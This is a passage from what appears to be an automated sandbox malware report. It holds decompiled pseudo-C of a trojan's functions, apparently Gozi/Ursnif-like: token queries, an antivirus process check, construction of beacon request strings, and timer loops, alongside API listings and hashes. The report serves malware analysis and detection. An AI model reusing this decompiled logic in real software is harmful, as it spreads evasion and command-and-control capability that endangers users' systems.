					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04616837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E046150CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                0x04612d13
                                0x04612d14
                                0x04612d15
                                0x04612d16
                                0x04612d17
                                0x04612d1b
                                0x04612d22
                                0x04612d31
                                0x04612d34
                                0x04612d37
                                0x04612d3e
                                0x04612d41
                                0x04612d44
                                0x04612d47
                                0x04612d4a
                                0x04612d55
                                0x04612d57
                                0x04612d60
                                0x04612d68
                                0x04612d6a
                                0x04612d7c
                                0x04612d86
                                0x04612d8a
                                0x04612d99
                                0x04612d9d
                                0x04612da6
                                0x04612dae
                                0x04612dae
                                0x04612db0
                                0x04612db0
                                0x04612db8
                                0x04612dbe
                                0x04612dc2
                                0x04612dc2
                                0x04612dcd

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04612D4D
                                • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 04612D60
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04612D7C
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04612D99
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04612DA6
                                • NtClose.NTDLL(00000000), ref: 04612DB8
                                • NtClose.NTDLL(00000000), ref: 04612DC2
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 2e8b8674d019e64028a06d9df77d273946c1e232a086e2d3dfc851c4848c1e5c
                                • Instruction ID: 3eb8c99f1feaef25ef72a1d894debf9b3a022b21ca22a65ccc57c476c71a319f
                                • Opcode Fuzzy Hash: 2e8b8674d019e64028a06d9df77d273946c1e232a086e2d3dfc851c4848c1e5c
                                • Instruction Fuzzy Hash: F32105B2900218BBDB01AFA4CC45DDEBFBDEF09B50F144066F905A6160E7719A84DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0461513E, Relevance: 7.5, APIs: 5, Instructions: 41processCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0461513E() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300); // executed
					while(_t8 != 0) {
						_t9 =  *0x461a2d4; // 0xdad5a8
						_t2 = _t9 + 0x461bdd4; // 0x73617661
						if(StrStrIA( &_v264, _t2) != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300); // executed
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                0x04615149
                                0x0461514e
                                0x04615153
                                0x04615157
                                0x04615161
                                0x04615192
                                0x04615168
                                0x0461516d
                                0x04615183
                                0x0461519a
                                0x04615185
                                0x0461518d
                                0x00000000
                                0x0461518d
                                0x0461519b
                                0x0461519c
                                0x00000000
                                0x0461519c
                                0x00000000
                                0x04615196
                                0x046151a2
                                0x046151a7

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0461514E
                                • Process32First.KERNEL32(00000000,?), ref: 04615161
                                • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 0461517B
                                • Process32Next.KERNEL32(00000000,?), ref: 0461518D
                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0461519C
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3243318325-0
                                • Opcode ID: 79ddc82f9403d6fe1fe30c13ebd7ca3d336cbab640e7a6277a5a4c02c6054f3a
                                • Instruction ID: 6556a77001958a678cc955f20d3ed98ed86da5852fbceaf7aacb134489a0df85
                                • Opcode Fuzzy Hash: 79ddc82f9403d6fe1fe30c13ebd7ca3d336cbab640e7a6277a5a4c02c6054f3a
                                • Instruction Fuzzy Hash: 5BF0BB7560112476E722EA769C4ADEBB7ACDBC4718F0C0166ED46C3120FA34ED468AA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046146D1, Relevance: 33.3, APIs: 22, Instructions: 262memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 77%
                                			E046146D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				signed int _t122;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x461a018; // 0x4934a3dd
				asm("bswap eax");
				_t65 =  *0x461a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x461a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x461a00c; // 0x69ab8210
				asm("bswap eax");
				_t68 =  *0x461a2d4; // 0xdad5a8
				_t3 = _t68 + 0x461b613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x461a02c,  *0x461a004, _t63);
				_t71 = E04616A09();
				_t72 =  *0x461a2d4; // 0xdad5a8
				_t4 = _t72 + 0x461b653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x461a2d4; // 0xdad5a8
					_t8 = _t139 + 0x461b65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E04615040(_t144);
				_t77 =  *0x461a2d4; // 0xdad5a8
				_t10 = _t77 + 0x461b302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x461a2d4; // 0xdad5a8
				_t12 = _t81 + 0x461b7aa; // 0x53c8d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x461b2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x461a31c; // 0x53c95e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x461a2d4; // 0xdad5a8
					_t18 = _t135 + 0x461b8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x461a32c; // 0x53c95b0
				if(_t86 != 0) {
					_t132 =  *0x461a2d4; // 0xdad5a8
					_t20 = _t132 + 0x461b676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x461a37c; // 0x53c9630
				_t88 = E04612885(0x461a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0x461a290, _t167, _t143); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x461a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x461a290, _t167, _v12);
						goto L28;
					}
					E04612DD0(GetTickCount());
					_t95 =  *0x461a37c; // 0x53c9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x461a37c; // 0x53c9630
					__imp__(_t99 + 0x40);
					_t101 =  *0x461a37c; // 0x53c9630
					_t102 = E0461624D(1, _t156, _t143,  *_t101); // executed
					_t163 = _t102;
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x461a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x46192ac);
					_push(_t163);
					_t107 = E046121C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x461a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E04614AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E04611492();
						L24:
						HeapFree( *0x461a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E046126C9(_t143, 0xffffffffffffffff, _t163,  &_v16); // executed
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_t122 = E0461161A(_t171, _a4, _a12, _a16); // executed
						_a20 = _t122;
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E046150CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E0461580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E046150CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}




























































                                0x046146d1
                                0x046146d1
                                0x046146d1
                                0x046146da
                                0x046146df
                                0x046146e6
                                0x046146e8
                                0x046146e8
                                0x046146f5
                                0x04614700
                                0x04614703
                                0x0461470e
                                0x04614711
                                0x04614716
                                0x04614719
                                0x0461471e
                                0x04614721
                                0x0461472d
                                0x0461473a
                                0x0461473c
                                0x04614742
                                0x04614747
                                0x04614752
                                0x04614754
                                0x04614757
                                0x0461475d
                                0x0461475f
                                0x04614767
                                0x04614772
                                0x04614774
                                0x04614777
                                0x04614777
                                0x04614779
                                0x04614780
                                0x04614785
                                0x04614792
                                0x04614794
                                0x04614799
                                0x046147a1
                                0x046147a4
                                0x046147aa
                                0x046147b5
                                0x046147b7
                                0x046147bc
                                0x046147c1
                                0x046147c4
                                0x046147c9
                                0x046147d4
                                0x046147d6
                                0x046147d9
                                0x046147d9
                                0x046147db
                                0x046147e2
                                0x046147e5
                                0x046147ea
                                0x046147f4
                                0x046147f6
                                0x046147f6
                                0x046147f9
                                0x04614807
                                0x0461480c
                                0x04614810
                                0x04614813
                                0x046149dd
                                0x046149e5
                                0x046149f2
                                0x04614819
                                0x04614825
                                0x0461482d
                                0x04614830
                                0x046149cd
                                0x046149d7
                                0x00000000
                                0x046149d7
                                0x0461483c
                                0x04614841
                                0x0461484a
                                0x0461485b
                                0x0461485f
                                0x04614868
                                0x0461486e
                                0x04614876
                                0x0461487b
                                0x04614882
                                0x0461488b
                                0x04614891
                                0x046149bd
                                0x046149c7
                                0x00000000
                                0x046149c7
                                0x0461489d
                                0x046148a3
                                0x046148a4
                                0x046148ab
                                0x046148ae
                                0x046149af
                                0x046149b7
                                0x00000000
                                0x046149b7
                                0x046148b7
                                0x046148bd
                                0x046148c6
                                0x046148cf
                                0x046148da
                                0x046148e1
                                0x046148e4
                                0x046149f5
                                0x04614997
                                0x04614997
                                0x0461499c
                                0x046149a7
                                0x046149ad
                                0x00000000
                                0x046149ad
                                0x046148ee
                                0x046148f5
                                0x046148f8
                                0x046148fd
                                0x04614908
                                0x0461490d
                                0x04614910
                                0x04614916
                                0x0461491c
                                0x04614922
                                0x04614925
                                0x0461492b
                                0x0461492e
                                0x04614933
                                0x04614937
                                0x04614937
                                0x04614943
                                0x0461494f
                                0x04614953
                                0x04614955
                                0x0461495a
                                0x0461495c
                                0x04614961
                                0x04614966
                                0x04614973
                                0x0461497b
                                0x0461497e
                                0x0461497e
                                0x0461495a
                                0x00000000
                                0x04614945
                                0x04614949
                                0x04614980
                                0x04614983
                                0x0461498c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0461498c
                                0x0461494b
                                0x00000000
                                0x0461494b
                                0x04614943

                                APIs
                                • GetTickCount.KERNEL32 ref: 046146E8
                                • wsprintfA.USER32 ref: 04614735
                                • wsprintfA.USER32 ref: 04614752
                                • wsprintfA.USER32 ref: 04614772
                                • wsprintfA.USER32 ref: 04614790
                                • wsprintfA.USER32 ref: 046147B3
                                • wsprintfA.USER32 ref: 046147D4
                                • wsprintfA.USER32 ref: 046147F4
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04614825
                                • GetTickCount.KERNEL32 ref: 04614836
                                • RtlEnterCriticalSection.NTDLL(053C95F0), ref: 0461484A
                                • RtlLeaveCriticalSection.NTDLL(053C95F0), ref: 04614868
                                  • Part of subcall function 0461624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616278
                                  • Part of subcall function 0461624D: lstrlen.KERNEL32(00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616280
                                  • Part of subcall function 0461624D: strcpy.NTDLL ref: 04616297
                                  • Part of subcall function 0461624D: lstrcat.KERNEL32(00000000,00000000), ref: 046162A2
                                  • Part of subcall function 0461624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 046162BF
                                • StrTrimA.SHLWAPI(00000000,046192AC,?,053C9630), ref: 0461489D
                                  • Part of subcall function 046121C1: lstrlen.KERNEL32(053C87FA,00000000,00000000,00000000,04617100,00000000), ref: 046121D1
                                  • Part of subcall function 046121C1: lstrlen.KERNEL32(?), ref: 046121D9
                                  • Part of subcall function 046121C1: lstrcpy.KERNEL32(00000000,053C87FA), ref: 046121ED
                                  • Part of subcall function 046121C1: lstrcat.KERNEL32(00000000,?), ref: 046121F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 046148BD
                                • lstrcat.KERNEL32(00000000,?), ref: 046148CF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 046148D5
                                  • Part of subcall function 04614AA6: lstrlen.KERNEL32(?,00000000,053C9C98,74ECC740,046113D0,053C9E9D,046155DE,046155DE,?,046155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04614AAD
                                  • Part of subcall function 04614AA6: mbstowcs.NTDLL ref: 04614AD6
                                  • Part of subcall function 04614AA6: memset.NTDLL ref: 04614AE8
                                • wcstombs.NTDLL ref: 04614966
                                  • Part of subcall function 0461161A: SysAllocString.OLEAUT32(00000000), ref: 0461165B
                                  • Part of subcall function 0461161A: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 046116DD
                                  • Part of subcall function 0461161A: StrStrIW.SHLWAPI(00000000,006E0069), ref: 0461171C
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 046149A7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 046149B7
                                • HeapFree.KERNEL32(00000000,00000000,?,053C9630), ref: 046149C7
                                • HeapFree.KERNEL32(00000000,?), ref: 046149D7
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 046149E5
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 2871901346-0
                                • Opcode ID: 00c7e6f18564e1f4d20e0a49636c79d3bc268f2a0d67ceea5df1ca498a14fb95
                                • Instruction ID: 8e4828e00fc0be5b178a59af927bb6dc700a06c13eef107ab739f6b59a57ba71
                                • Opcode Fuzzy Hash: 00c7e6f18564e1f4d20e0a49636c79d3bc268f2a0d67ceea5df1ca498a14fb95
                                • Instruction Fuzzy Hash: 30A16C71601109AFDB11DFA8DC88EAA3BB8EF48755B1D4026F409C7271EB39E954CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04612022, Relevance: 16.6, APIs: 11, Instructions: 149timememoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 83%
                                			E04612022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x461a298);
					_v20 = 0;
					_v16 = 0;
					L04617D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x461a2c4; // 0x2fc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x461a2a4 = 5;
						} else {
							_t69 = E04611AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x461a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E04615F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E04613032(_t73, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x461a29c);
							goto L21;
						} else {
							__eflags =  *0x461a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04611492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x461a2a0);
								L21:
								L04617D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x461a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}





























                                0x04612022
                                0x04612034
                                0x04612037
                                0x04612043
                                0x0461204b
                                0x0461204e
                                0x046121b4
                                0x04612054
                                0x04612054
                                0x04612056
                                0x0461205b
                                0x0461205c
                                0x04612062
                                0x04612065
                                0x04612068
                                0x04612076
                                0x04612081
                                0x04612084
                                0x04612086
                                0x04612093
                                0x0461209d
                                0x046120a1
                                0x046120a4
                                0x046120a9
                                0x046120b4
                                0x046120b4
                                0x046120ab
                                0x046120ab
                                0x046120b2
                                0x00000000
                                0x00000000
                                0x046120b2
                                0x046120be
                                0x00000000
                                0x046120c1
                                0x046120c5
                                0x046120d0
                                0x046120d0
                                0x046120d7
                                0x046120dc
                                0x046120e3
                                0x046120ec
                                0x046120f2
                                0x046120f5
                                0x046120fc
                                0x046120ff
                                0x00000000
                                0x00000000
                                0x04612101
                                0x04612104
                                0x04612107
                                0x0461210a
                                0x00000000
                                0x0461210c
                                0x04612116
                                0x0461211b
                                0x0461211b
                                0x00000000
                                0x04612149
                                0x04612149
                                0x0461214e
                                0x0461216d
                                0x0461216f
                                0x04612174
                                0x04612175
                                0x00000000
                                0x04612150
                                0x04612150
                                0x04612156
                                0x00000000
                                0x04612158
                                0x04612158
                                0x0461215d
                                0x0461215f
                                0x04612164
                                0x04612165
                                0x0461217b
                                0x0461217b
                                0x04612183
                                0x0461218e
                                0x04612191
                                0x0461219c
                                0x0461219e
                                0x046121a0
                                0x046121a3
                                0x00000000
                                0x046121a9
                                0x00000000
                                0x046121a9
                                0x046121a3
                                0x04612156
                                0x00000000
                                0x0461214e
                                0x0461211e
                                0x04612120
                                0x04612123
                                0x04612124
                                0x04612124
                                0x04612128
                                0x04612132
                                0x04612132
                                0x04612138
                                0x0461213b
                                0x0461213b
                                0x04612141
                                0x04612141
                                0x046121be
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 04612037
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04612043
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04612068
                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04612084
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0461209D
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04612132
                                • CloseHandle.KERNEL32(?), ref: 04612141
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0461217B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0461560C), ref: 04612191
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0461219C
                                  • Part of subcall function 04611AB8: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,053C9308,00000000,?,7519F710,00000000,7519F730), ref: 04611B07
                                  • Part of subcall function 04611AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,053C9340,?,00000000,30314549,00000014,004F0053,053C92FC), ref: 04611BA4
                                  • Part of subcall function 04611AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,046120B0), ref: 04611BB6
                                • GetLastError.KERNEL32 ref: 046121AE
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: 090ff3761b7b33a155122a0c62737b45a10c2cf664cf6753b7d960ba91dcaedc
                                • Instruction ID: 6bd97e2d89e38d6b91af3665c1fd9f834732050053eed5a7c384a4271a2daf1d
                                • Opcode Fuzzy Hash: 090ff3761b7b33a155122a0c62737b45a10c2cf664cf6753b7d960ba91dcaedc
                                • Instruction Fuzzy Hash: 75516EB1901228AEDF11DFD4DC44DEEBFB9EF05725F184256F610B22A0E775AA44CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04616384, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E04616384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04617D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x461a2d4; // 0xdad5a8
				_t5 = _t13 + 0x461b8a2; // 0x53c8e4a
				_t6 = _t13 + 0x461b57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04617A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0x461a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                0x04616384
                                0x0461638c
                                0x04616390
                                0x04616396
                                0x0461639b
                                0x046163a0
                                0x046163a3
                                0x046163a6
                                0x046163ab
                                0x046163ac
                                0x046163af
                                0x046163b4
                                0x046163bb
                                0x046163c5
                                0x046163c7
                                0x046163c8
                                0x046163cb
                                0x046163e7
                                0x046163ed
                                0x046163f1
                                0x0461643f
                                0x046163f3
                                0x04616400
                                0x04616410
                                0x04616418
                                0x0461642a
                                0x0461642e
                                0x00000000
                                0x00000000
                                0x0461641a
                                0x0461641d
                                0x04616422
                                0x04616424
                                0x04616424
                                0x04616402
                                0x04616404
                                0x04616430
                                0x04616431
                                0x04616431
                                0x04616400
                                0x04616446

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,04615488,?,00000001,?), ref: 04616390
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 046163A6
                                • _snwprintf.NTDLL ref: 046163CB
                                • CreateFileMappingW.KERNELBASE(000000FF,0461A2F8,00000004,00000000,00001000,?), ref: 046163E7
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04615488,?), ref: 046163F9
